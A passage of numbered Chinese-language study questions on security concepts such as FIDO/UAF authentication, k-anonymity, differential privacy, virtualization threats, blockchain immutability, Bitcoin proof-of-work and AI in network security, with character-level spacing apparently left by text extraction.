4. FIDO 认证 协议 的 主要 目的 是 什么 ? 简 述 UAF 认证 的 主要 流程 。 

5. 什么 是 k- 匿 名 ? 

6. 如 果 针 对 差分 隐私 机 制 保护 的 一 个 统计 查询 ,是 否 可 以 无 限制 地 进行 重复 查询 ， 
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为 什么 ? 
7. 虚拟 化 主要 有 哪些 方式 ? 其 面临 的 安全 威胁 是 什么 ? 
8. 简 述 区 块 链 的 数据 结构 ,说 明 其 为 什么 具有 不 可 自 改 的 特性 。 
9. 分 析 比 特 币 采用 工作 量 证明 的 共识 机 制 与 安全 性 之 间 的 关系 。 
10. 举例 说 明 人 工 智 能 对 网 络 安全 的 影响 。 
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